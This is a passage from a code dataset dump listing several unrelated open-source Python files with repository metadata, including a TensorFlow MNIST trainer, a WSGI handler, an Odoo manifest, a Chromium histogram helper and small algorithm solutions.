\x00\x63\x00\x6f\x00\x6e\
\x00\x08\
\x0c\x47\x58\x67\
\x00\x73\
\x00\x65\x00\x6e\x00\x64\x00\x2e\x00\x70\x00\x6e\x00\x67\
\x00\x0b\
\x0c\x6a\x2c\x47\
\x00\x72\
\x00\x65\x00\x66\x00\x72\x00\x65\x00\x73\x00\x68\x00\x2e\x00\x70\x00\x6e\x00\x67\
\x00\x0d\
\x0b\xa9\xda\x27\
\x00\x73\
\x00\x75\x00\x6a\x00\x65\x00\x6f\x00\x6e\x00\x67\x00\x6b\x00\x75\x00\x2e\x00\x70\x00\x6e\x00\x67\
"
qt_resource_struct = b"\
\x00\x00\x00\x00\x00\x02\x00\x00\x00\x02\x00\x00\x00\x01\
\x00\x00\x00\x10\x00\x02\x00\x00\x00\x02\x00\x00\x00\x04\
\x00\x00\x00\x00\x00\x02\x00\x00\x00\x01\x00\x00\x00\x03\
\x00\x00\x00\x50\x00\x00\x00\x00\x00\x01\x00\x00\x61\xfa\
\x00\x00\x00\x1e\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\
\x00\x00\x00\x34\x00\x00\x00\x00\x00\x01\x00\x00\x23\x64\
"
def qInitResources():
QtCore.qRegisterResourceData(0x01, qt_resource_struct, qt_resource_name, qt_resource_data)
def qCleanupResources():
QtCore.qUnregisterResourceData(0x01, qt_resource_struct, qt_resource_name, qt_resource_data)
qInitResources()
| [
"[email protected]"
] | |
cd76f1a279672c1203c7f4ca62612b4e330c4e08 | c7d0432f0cf3ced255be3e9d33fcc5e2250b340b | /main_old_style.py | 52c054eeee47a4deea458b143dd98c8c61646ec4 | [
"MIT"
] | permissive | tgjeon/TensorFlow-Practical-Coding-Pattern | 5f0aeab291a92811b0003bed26d3a3d8fab891e7 | 1e51f0d8c8df71f2a777f2ba3faf00614e011111 | refs/heads/master | 2021-01-11T19:00:46.562355 | 2017-01-18T07:04:06 | 2017-01-18T07:04:06 | 79,291,145 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,308 | py | # Source code from https://github.com/codertimo/Tensorflow-Study/blob/master/7-ConvolutionalNet/MNISTConvolutionalNet.py
#-*- coding: utf-8 -*-
import tensorflow as tf
import numpy as np
import time
# MNIST 데이터를 다운로드 한다.
from tensorflow.examples.tutorials.mnist import input_data
mnist = input_data.read_data_sets("../MNIST_data/", one_hot=True)
x_data, y_data, test_x, test_y = mnist.train.images, mnist.train.labels, mnist.test.images, mnist.test.labels
def init_weight(size_array, name,stddev=0.01):
return tf.Variable(tf.random_normal(size_array,stddev=stddev),name=name)
def model(X,w1,w2,w3,w4,w_h,hidden_rate,last_rate):
# X : (?,28,28,1)
c1 = tf.nn.relu(tf.nn.conv2d(X,w1,strides=[1,1,1,1],padding='SAME')) ## c1 :(?,28,28,32) -> 28x28 32 Ouput
l1 = tf.nn.max_pool(c1, ksize=[1,2,2,1],strides=[1,2,2,1],padding='SAME') ## l1 : (?,14,14,32) -> 14x14 32 Ouput
l1 = tf.nn.dropout(l1,hidden_rate)
c2 = tf.nn.relu(tf.nn.conv2d(l1,w2,strides=[1,1,1,1],padding='SAME')) ## c1 :(?,14,14,64) -> 14x14 64 ouput
l2 = tf.nn.max_pool(c2, ksize=[1,2,2,1],strides=[1,2,2,1],padding='SAME') ## l1 : (?,7,7,64) ->7x7 64 Ouput
l2 = tf.nn.dropout(l2,hidden_rate)
c3 = tf.nn.relu(tf.nn.conv2d(l2,w3,strides=[1,1,1,1],padding='SAME')) ## c1 :(?,7,7,128) -> 14x14 128 ouput
l3 = tf.nn.max_pool(c3, ksize=[1,2,2,1],strides=[1,2,2,1],padding='SAME') ## l1 : (?,4,4,128) ->7x7 128 Ouput
l3 = tf.reshape(l3,[-1,w4.get_shape().as_list()[0]])
l3 = tf.nn.dropout(l3,hidden_rate)
l4 = tf.nn.relu(tf.matmul(l3,w4))
l4 = tf.nn.dropout(l4,last_rate)
hyp = tf.matmul(l4,w_h)
return hyp
##---------- 1.Initialize ---------
X = tf.placeholder("float", [None, 28, 28, 1])
Y = tf.placeholder("float", [None, 10])
droprate_hidden = tf.placeholder("float")
droprate_last = tf.placeholder("float")
x_data = x_data.reshape(-1, 28, 28, 1) # 28x28x1 input img
test_x = test_x.reshape(-1, 28, 28, 1) # 28x28x1 input img
w1 = init_weight([28,28,1,32],"w1") # 3x3x1 Input, 32 Ouput
w2 = init_weight([14,14,32,64],"w2") # 3x3x32 Input, 64 Ouput
w3 = init_weight([7,7,64,128],"w3") # 3x3x64 Input, 128 Ouput
w4 = init_weight([4*4*128,625],"w4")
w_h = init_weight([625,10],"wh")
batch_size = 128
test_size = 256
#-------- 2. run train ----------
hyp = model(X,w1,w2,w3,w4,w_h,droprate_hidden,droprate_last)
print (hyp)
print (Y)
cost = tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits(hyp,Y))
#tf.train.AdamOptimizer
optimizer =tf.train.RMSPropOptimizer(0.001,0.9).minimize(cost)
predict_optimizer = tf.arg_max(hyp,1)
with tf.Session() as session:
tf.initialize_all_variables().run()
saver = tf.train.Saver()
try:
saver.restore(session, "./model_1.ckpt")
except:
pass
for step in range(100):
test_index = np.arange(len(test_x)) #[1,2,3,..]
np.random.shuffle(test_index)
test_index = test_index[0:256] # 그중에서 256개 가져오기
count_size = len(x_data)/batch_size
count = 0
avg_time = 0.0
for start,end in zip(range(0,len(x_data),batch_size),range(batch_size,len(y_data),batch_size)):
if(count%50==0):
test_index = np.arange(len(test_x)) #[1,2,3,..]
np.random.shuffle(test_index)
test_index = test_index[0:256] # 그중에서 256개 가져오기
accruacy = np.mean(np.argmax(test_y[test_index],axis=1) \
== session.run(predict_optimizer,feed_dict={X:test_x[test_index],Y:test_y[test_index],droprate_last:1.0,droprate_hidden:1.0}))
print("Accuracy :"+str(accruacy))
save_path = saver.save(session, "./model_1.ckpt")
print("모델들이 저장되었습니다")
count+=1
start_time = time.time()
session.run(optimizer,feed_dict={X:x_data[start:end],Y:y_data[start:end],droprate_hidden:0.8,droprate_last:0.5})
avg_time+= time.time()-start_time
print(str(count)+"/"+str(count_size),start,end,("예상소요시간:"+str(int(round(avg_time/count*(count_size-count))/60))+"분"),("cost:"+str(session.run(cost,feed_dict={X:x_data[start:end],Y:y_data[start:end],droprate_hidden:0.8,droprate_last:0.5}))))
#------------------------------- | [
"[email protected]"
] | |
3cddaca39413e5ff9c3efea0843adb6981f9df82 | cf5b4746cc08ae598d41bbcd275a0b8b8b7f6103 | /map.py | 8517829cd2e1cbcc0f551f167fa7418204213126 | [] | no_license | Dontsov/AltGeoView | 403d5a59df802fc6b708708ef402196562b5a8ba | fb10402e9ee5fe57bc7ddc6df6b93dbbae5e24a8 | refs/heads/master | 2016-09-10T18:56:48.212480 | 2014-09-08T03:24:00 | 2014-09-08T03:24:00 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 563 | py | import sys
import os
def application(environ, start_response):
try:
status = '200 OK'
f = open(r'./template/map.html')
output = f.read()
f.close()
response_headers = [('Content-type', 'html'),
('Content-Length', str(len(output)))]
start_response(status, response_headers)
return [output]
except:
status = "500 Error"
response_headers = [("content-type", "text/plain")]
start_response(status, response_headers, sys.exc_info())
return ["Error"] | [
"[email protected]"
] | |
db9062a3780da2045684e987f72463040d963ea3 | d036afd53acede904ef98323b86e25ffd7751472 | /Classes/Setup.py | c412b07d4e01525180100619fad3e93b9eaff8e1 | [] | no_license | michelelt/fantasturie | 0fe84690c1a04a6ced51c8feb8f0040daad0d8a2 | 513c9f0d2e9f0cd69b222428f4410d4a9b3de1eb | refs/heads/main | 2023-03-09T07:44:58.902952 | 2021-02-12T09:53:00 | 2021-02-12T09:53:00 | 327,438,586 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 821 | py | from pathlib import Path
import os
import shutil
class Setupper:
def __init__(self, config, season, journal):
self.root = config['data_root']
self.seasons = season
self.journal = journal
self.create_path_if_not_exists(self.root.joinpath(self.journal))
for season in self.seasons:
self.create_path_if_not_exists(self.root.joinpath(self.journal).joinpath(season))
for day in range(1,39):
self.create_path_if_not_exists\
(
self.root\
.joinpath(self.journal)\
.joinpath(season)\
.joinpath(str(day))
)
def create_path_if_not_exists(self, p):
if not os.path.exists(p):
os.makedirs(p)
| [
"[email protected]"
] | |
cab1203f692a6d400a5b13239994199bce54ce46 | c324a6d923bae3a00bd1dc69a43d0e5c707a104a | /addons-vauxoo/analytic_entry_line_plans/__openerp__.py | df4233e8017a53b64534c2b9e08e4e30fa2f5ba7 | [] | no_license | meswapnilwagh/odoo-adr | 5c593c2240d23b79811ccd7b5297b634e5ffe19d | 442c8d5fa52cab30028a26dd93bd8eae88d58fed | refs/heads/master | 2020-01-27T10:03:27.142715 | 2015-09-04T14:36:59 | 2015-09-04T14:36:59 | 50,238,226 | 0 | 4 | null | 2016-01-23T12:53:28 | 2016-01-23T12:53:25 | null | UTF-8 | Python | false | false | 2,022 | py | # -*- encoding: utf-8 -*-
###############################################################################
# Module Writen to OpenERP, Open Source Management Solution
# Copyright (C) OpenERP Venezuela (<http://www.vauxoo.com>).
# All Rights Reserved
############# Credits #########################################################
# Coded by: Yanina Aular <[email protected]>
# Planified by: Humberto Arocha <[email protected]>
# Audited by: Humberto Arocha <[email protected]>
###############################################################################
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as published
# by the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
###############################################################################
{
"name": "Analytic Entry Line Plans",
"version": "1.0",
"author": "Vauxoo",
"category": "",
"description": """
Analytic Entry Line Plans
-------------------------
This module takes analytics_id field from move line for grouping of
analytics entry lines by analytics_id.
""",
"website": "http://www.vauxoo.com/",
"license": "",
"depends": [
"account",
"analytic",
"account_analytic_plans"
],
"demo": [],
"data": [
"view/account_analytic_plans_view.xml"
],
"test": [],
"js": [],
"css": [],
"qweb": [],
"installable": True,
"auto_install": False,
"active": False
} | [
"[email protected]"
] | |
a36625a8fa3ba2865da0c8c905df4519226508d5 | 2185d8dbf54692d43df74ba5c023302681b2be90 | /settings/settings.py | 0eeea23e46948f81edd8b80ea78d995f2bc77bcf | [] | no_license | ShariqM/Learning | 8d84f5ec558dd7554b7940d3ec923eb97d0717a4 | ea9a68215bf665cda953413b8d51010113390b7b | refs/heads/master | 2016-09-03T06:48:50.663642 | 2014-07-24T00:58:12 | 2014-07-24T00:58:12 | 16,339,472 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,570 | py | from strats.randomstrat import *
from strats.unembodiedstrat import *
from strats.piggreedystrat import *
from strats.pigvistrat import *
from strats.ltastrat import *
from strats.ltavistrat import *
from strats.cbstrat import *
from strats.bossstrat import *
from strats.dystrat import *
from strats.chainstrat import *
from imodels.chinese import *
from imodels.dirichlet import *
# Run parameters
SS = 0
MAZE = 'maze.mz' # See files in maze_files/ dir
STEPS = 300 # Number of time steps to run
RUNS = 4 # Number of runs
# Strats to run [Choose a (Strategy, Internal Model) pair]
import numpy
def init_strats():
arr = [
#RandomStrat(ENVIRON[0],
#ChineseRProcess(ENVIRON[0], THETA, ALPHA, False, True),
#COLORS['red']),
#
#UnembodiedStrat(ENVIRON[0],
#ChineseRProcess(ENVIRON[0], THETA, ALPHA, False, True),
#COLORS['black']),
#
PigVIStrat(ENVIRON[0],
Dirichlet(ENVIRON[0], D_ALPHA),
COLORS['blue'], PLUS=0, EXPLORER=False),
#
#ES = int(3.0/4 * STEPS)
#im = ChineseRProcess(ENVIRON[0], THETA, ALPHA)
#arr.append(DyStrat(ENVIRON[0], im,
#PigVIStrat(ENVIRON[0], im, PLUS=0, EXPLORER=False),
#BossStrat(ENVIRON[0], im, -1), ES, True))
#
#im = ChineseRProcess(ENVIRON[0], THETA, ALPHA)
#arr.append(DyStrat(ENVIRON[0], im,
#LTAStrat(ENVIRON[0], im),
#BossStrat(ENVIRON[0], im, -1), ES, True))
#PigVIStrat(ENVIRON[0],
#ChineseRProcess(ENVIRON[0], THETA, ALPHA),
#COLORS['green'], PLUS=0, EXPLORER=False),
#
#PigVIStrat(ENVIRON[0],
#ChineseRProcess(ENVIRON[0], THETA, ALPHA, False, True),
#COLORS['purple'], PLUS=0, EXPLORER=False),
##
#CBStrat(ENVIRON[0],
#ChineseRProcess(ENVIRON[0], THETA, ALPHA, False, True),
#COLORS['purple']),
##
#PigVIStrat(ENVIRON[0],
#ChineseRProcess(ENVIRON[0], THETA, ALPHA, False, True),
#COLORS['grue2'], PLUS=1, EXPLORER=False),
#LTAStrat(ENVIRON[0],
#ChineseRProcess(ENVIRON[0], THETA, ALPHA, False, True),
#COLORS['yellow2']),
]
#for (t,ka) in [(0.001, math.log(2))]:
#for (t,ka) in [(0.12, 0.13)]:
for i in range(1):
break
for (t,ka) in [(math.log(2), 0.0), (0.38, 0.31), (0.001, 0.693), (0.001, math.log(2)), (0.001, 0.25), (0.120, 0.13)]:
break
max_k = 4 + 1.0 # Hacky... (Plus one for hypothetical new state)
a = ka / max_k
if a < 0.0 and not t + max_k * a > 0.0:
continue
if a >= 0.0 and not t > -a:
continue
if a > 1.0:
continue
if t == 0.0:
continue
arr.append(
PigVIStrat(ENVIRON[0],
ChineseRProcess(ENVIRON[0], THETA, ALPHA),
COLORS['blue'], PLUS=0, EXPLORER=False))
arr.append(
PigVIStrat(ENVIRON[0],
ChineseRProcess(ENVIRON[0], THETA, ALPHA, False, True),
COLORS['green'], PLUS=0, EXPLORER=False))
#arr.append(
#PigVIStrat(ENVIRON[0],
#ChineseRProcess(ENVIRON[0], 0.001, 0.25, True),
#COLORS['green'], PLUS=0, EXPLORER=False))
#arr.append(
#PigVIStrat(ENVIRON[0],
#GamPypProcess(ENVIRON[0], 0.001, 0.25),
#COLORS['red'], PLUS=0, EXPLORER=False))
#arr.append(
#PigVIStrat(ENVIRON[0],
#ChineseRProcess(ENVIRON[0], 0.12, 0.13, True),
#COLORS['purple'], PLUS=0, EXPLORER=False))
#arr.append(
#PigVIStrat(ENVIRON[0],
#GammaProcess(ENVIRON[0], 0.25),
#COLORS['grue'], PLUS=0, EXPLORER=False))
#arr.append(
#PigVIStrat(ENVIRON[0],
#GammaProcess(ENVIRON[0], THETA),
#COLORS['green'], PLUS=0, EXPLORER=False))
#ES = int(2.0/4 * STEPS)
#im = ChineseRProcess(ENVIRON[0], THETA, ALPHA)
#arr.append(DyStrat(ENVIRON[0], im,
#PigVIStrat(ENVIRON[0], im, PLUS=0, EXPLORER=False),
#BossStrat(ENVIRON[0], im, -1), ES, True))
#
#im = ChineseRProcess(ENVIRON[0], THETA, ALPHA)
#arr.append(DyStrat(ENVIRON[0], im,
#LTAStrat(ENVIRON[0], im),
#BossStrat(ENVIRON[0], im, -2), ES, True))
#
return arr
| [
"[email protected]"
] | |
f0b33f2fccb3c1374656e29cf251afecba3abce1 | 9e988c0dfbea15cd23a3de860cb0c88c3dcdbd97 | /sdBs/AllRun/jl_202/sdB_jl_202_lc.py | 2b4f5c9ca7cb8de33dc66ce3c198d875d11dcd97 | [] | no_license | tboudreaux/SummerSTScICode | 73b2e5839b10c0bf733808f4316d34be91c5a3bd | 4dd1ffbb09e0a599257d21872f9d62b5420028b0 | refs/heads/master | 2021-01-20T18:07:44.723496 | 2016-08-08T16:49:53 | 2016-08-08T16:49:53 | 65,221,159 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 335 | py | from gPhoton.gAperture import gAperture
def main():
gAperture(band="NUV", skypos=[10.055208,-55.031192], stepsz=30., csvfile="/data2/fleming/GPHOTON_OUTPU/LIGHTCURVES/sdBs/sdB_jl_202/sdB_jl_202_lc.csv", maxgap=1000., overwrite=True, radius=0.00555556, annulus=[0.005972227,0.0103888972], verbose=3)
if __name__ == "__main__":
main()
| [
"[email protected]"
] | |
2525d1ca90ad85c1449626f82f62251595f9ced7 | 15f321878face2af9317363c5f6de1e5ddd9b749 | /solutions_python/Problem_136/2611.py | 27a7b364de7900bedf9a9711651bf3f79cebc26b | [] | no_license | dr-dos-ok/Code_Jam_Webscraper | c06fd59870842664cd79c41eb460a09553e1c80a | 26a35bf114a3aa30fc4c677ef069d95f41665cc0 | refs/heads/master | 2020-04-06T08:17:40.938460 | 2018-10-14T10:12:47 | 2018-10-14T10:12:47 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 243 | py | q = input()
for i in range(1,q+1):
p = 2.0
nums = raw_input().split()
c = float(nums[0])
b = float(nums[1])
x = float(nums[2])
t = c / p
while (x-c)*(p+b) > x*p :
p += b
t += c / p
t += (x-c)/p
print "Case #%d: %.8Lf" % (i,t)
| [
"[email protected]"
] | |
2a09d243c587552a52ad24359eec6472148d2c87 | 1af49694004c6fbc31deada5618dae37255ce978 | /tools/metrics/histograms/populate_enums.py | 1fbc60ce5a8511548b2822ac3d01d2379436dbba | [
"LGPL-2.0-or-later",
"Zlib",
"BSD-3-Clause",
"MIT",
"LGPL-2.1-only",
"LicenseRef-scancode-unknown-license-reference",
"MPL-1.1",
"GPL-2.0-only",
"Apache-2.0",
"LGPL-2.0-only",
"LicenseRef-scancode-unknown",
"APSL-2.0"
] | permissive | sadrulhc/chromium | 59682b173a00269ed036eee5ebfa317ba3a770cc | a4b950c23db47a0fdd63549cccf9ac8acd8e2c41 | refs/heads/master | 2023-02-02T07:59:20.295144 | 2020-12-01T21:32:32 | 2020-12-01T21:32:32 | 317,678,056 | 3 | 0 | BSD-3-Clause | 2020-12-01T21:56:26 | 2020-12-01T21:56:25 | null | UTF-8 | Python | false | false | 2,874 | py | # Copyright 2017 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Functions for populating enums with ukm events."""
from collections import namedtuple
import os
import sys
import xml.dom.minidom
import extract_histograms
sys.path.append(os.path.join(os.path.dirname(__file__), '..', 'ukm'))
import codegen
EventDetails = namedtuple("EventDetails", "name hash is_obsolete")
def _GetEventDetails(event):
"""Returns a simple struct containing the event details.
Args:
event: An event description as defined in ukm.xml.
Returns:
A struct containing the event name, truncated hash, and whether the event is
considered obsolete.
"""
name = event.getAttribute('name')
# The value is UKM event name hash truncated to 31 bits. This is recorded in
# https://cs.chromium.org/chromium/src/components/ukm/ukm_recorder_impl.cc?q=LogEventHashasUmaHistogram
hash = codegen.HashName(name) & 0x7fffffff
def _HasDirectObsoleteTag(node):
return any(
isinstance(child, xml.dom.minidom.Element)
and child.tagName == 'obsolete' for child in node.childNodes)
# The UKM event is considered obsolete if the event itself is marked as
# obsolete with a tag or all of its metrics are marked as obsolete.
is_event_obsolete = _HasDirectObsoleteTag(event)
are_all_metrics_obsolete = all(
_HasDirectObsoleteTag(metric)
for metric in event.getElementsByTagName('metric'))
return EventDetails(name=name,
hash=hash,
is_obsolete=is_event_obsolete or are_all_metrics_obsolete)
def PopulateEnumWithUkmEvents(doc, enum, ukm_events):
"""Populates the enum node with a list of ukm events.
Args:
doc: The document to create the node in.
enum: The enum node needed to be populated.
ukm_events: A list of ukm event nodes.
"""
event_details = [_GetEventDetails(event) for event in ukm_events]
event_details.sort(key=lambda event: event.hash)
for event in event_details:
node = doc.createElement('int')
node.attributes['value'] = str(event.hash)
label = event.name
# If the event is obsolete, mark it in the int's label.
if event.is_obsolete:
label += ' (Obsolete)'
node.attributes['label'] = label
enum.appendChild(node)
def PopulateEnumsWithUkmEvents(doc, enums, ukm_events):
"""Populates enum nodes in the enums with a list of ukm events
Args:
doc: The document to create the node in.
enums: The enums node to be iterated.
ukm_events: A list of ukm event nodes.
"""
for enum in extract_histograms.IterElementsWithTag(enums, 'enum', 1):
# We only special case 'UkmEventNameHash' currently.
if enum.getAttribute('name') == 'UkmEventNameHash':
PopulateEnumWithUkmEvents(doc, enum, ukm_events)
| [
"[email protected]"
] | |
45755d54b549bf785f78a678cd9f369f63c11e35 | 2c49b617f57636be97dcbdf8e6fdc87fcf2d1647 | /jens/management/manager_view.py | c04728ede674cb275d9489921bff50e3e1aa11f1 | [] | no_license | alirezamastery/backend | 1f87a1aa5c5c06802d31eb5c9fbc9e9cd2aaef0d | 2bf17e0783ca92a24eb9faf77617b14f79d67b7b | refs/heads/main | 2023-06-17T19:41:19.194378 | 2021-07-19T17:04:36 | 2021-07-19T17:04:36 | 319,387,658 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,813 | py | # from backend.admin import MyAdminSite
# from django.conf.urls import url
# from django.template.response import TemplateResponse
# from jens.models.category import Category
#
#
# def manager_view(request):
# context = dict(
# # Include common variables for rendering the admin template.
# MyAdminSite.each_context(request),
# # Anything else you want in the context...
# # 'from_me':'from me',
# )
# context['from_me'] = 'this is it'
# context['selectable_categories'] = list()
# context['selectable_categories'].append({'selected': None,
# 'options': Category.objects.filter(level=0)
# })
# context['leaves'] = None
#
# print(context['selectable_categories'])
#
# if request.method == 'POST':
# counter = 0
# while True:
# print('-' * 50)
# selected_category = None
# try:
# selected_category = request.POST.get(f'category_selector_{counter}')
# print(counter, selected_category)
# except:
# break
# context['selectable_categories'][counter]['selected'] = selected_category
# if selected_category:
# selected_category_obj = Category.objects.get(name=selected_category)
# children = selected_category_obj.get_children()
# print(children)
# if not children:
# selected_product = None
# try:
# selected_product = request.POST.get(f'leaves_selector')
# print(selected_product)
# except:
# pass
# if selected_product:
# context['leaves'] = {'selected': selected_product,
# 'options': selected_category_obj.products.all()
# }
# break
# context['leaves'] = {'selected': None,
# 'options': selected_category_obj.products.all()
# }
# print('reached to the products') # insert what you want to do here
# break
# print('all passed')
# context['selectable_categories'].append({'selected': None,
# 'options': children
# })
# else:
# break
# counter += 1
# return TemplateResponse(request, "admin/test_template.html", context)
| [
"[email protected]"
] | |
b831ca703761192c2fbc4542da6b5d93048a15d2 | 70056e5df55cab3afc374b04027bc7c5ec41b118 | /listReverse.py | 813bf67893cbe1ceda75566d59a704c017dadb51 | [] | no_license | retazo0018/guviPractice | f62d942f2e27245b5d21dfb98ebbc3fb37248041 | 1a99a3a0966b31bad6e45610991a17d79d83932f | refs/heads/master | 2021-07-14T00:26:19.161147 | 2020-06-24T05:52:26 | 2020-06-24T05:52:26 | 164,403,667 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 148 | py | n = int(input())
li = list(map(int,input().split()))
for i in range(len(li)-1,0,-1):
print(li[i],end="")
print("->",end="")
print(li[0],end="")
| [
"[email protected]"
] | |
000ae8064aafdef7ce4dd50557650992593bc3fe | dcce56815dca2b18039e392053376636505ce672 | /dumpscripts/re_simple_compiled.py | 9ea488af72c37b0ac64c5250000dc2c11d007f8c | [] | no_license | robertopauletto/PyMOTW-it_3.0 | 28ff05d8aeccd61ade7d4107a971d9d2576fb579 | c725df4a2aa2e799a969e90c64898f08b7eaad7d | refs/heads/master | 2021-01-20T18:51:30.512327 | 2020-01-09T19:30:14 | 2020-01-09T19:30:14 | 63,536,756 | 4 | 1 | null | null | null | null | UTF-8 | Python | false | false | 394 | py | # re_simple_compiled.py
import re
# Precompila i modelli
regexes = [
re.compile(p)
for p in ['questo', 'quello']
]
text = 'questo testo ha corrispondenza nel modello?'
print('Testo: {!r}\n'.format(text))
for regex in regexes:
print('Ricerca di "{}" ->'.format(regex.pattern), end=' ')
if regex.search(text):
print('trovato!')
else:
print('non trovato')
| [
"[email protected]"
] | |
4dabbb4c4df5d1ffdb60944c2949a582ec008fa1 | 3879d1ca43c573c209f962182cd1e7f7fe978fbf | /binarysearch/Longest-Increasing-Subsequence/Longest-Increasing-Subsequence.py | 344c27d87a42bf6e6b484a01e1a81fc998cacc08 | [] | no_license | DoctorLai/ACM | 34a5600a5adf22660c5d81b2d8b7a358be537ecf | aefa170f74c55c1230eb6f352770512b1e3f469e | refs/heads/master | 2023-09-01T02:13:01.604508 | 2023-08-31T15:42:07 | 2023-08-31T15:42:07 | 146,173,024 | 62 | 18 | null | 2020-10-11T13:19:57 | 2018-08-26T11:00:36 | C++ | UTF-8 | Python | false | false | 485 | py | # https://helloacm.com/teaching-kids-programming-greedy-algorithm-to-find-longest-increasing-subsequence-in-onlogn-via-binary-search/
# https://binarysearch.com/problems/Longest-Increasing-Subsequence
# MEDIUM, GREEDY
class Solution:
def solve(self, nums):
n = len(nums)
dp = [1] * n
for i in range(n):
for j in range(i):
if nums[i] > nums[j]:
dp[i] = max(dp[i], dp[j] + 1)
return max(dp, default=0)
| [
"[email protected]"
] |
Subsets and Splits
No saved queries yet
Save your SQL queries to embed, download, and access them later. Queries will appear here once saved.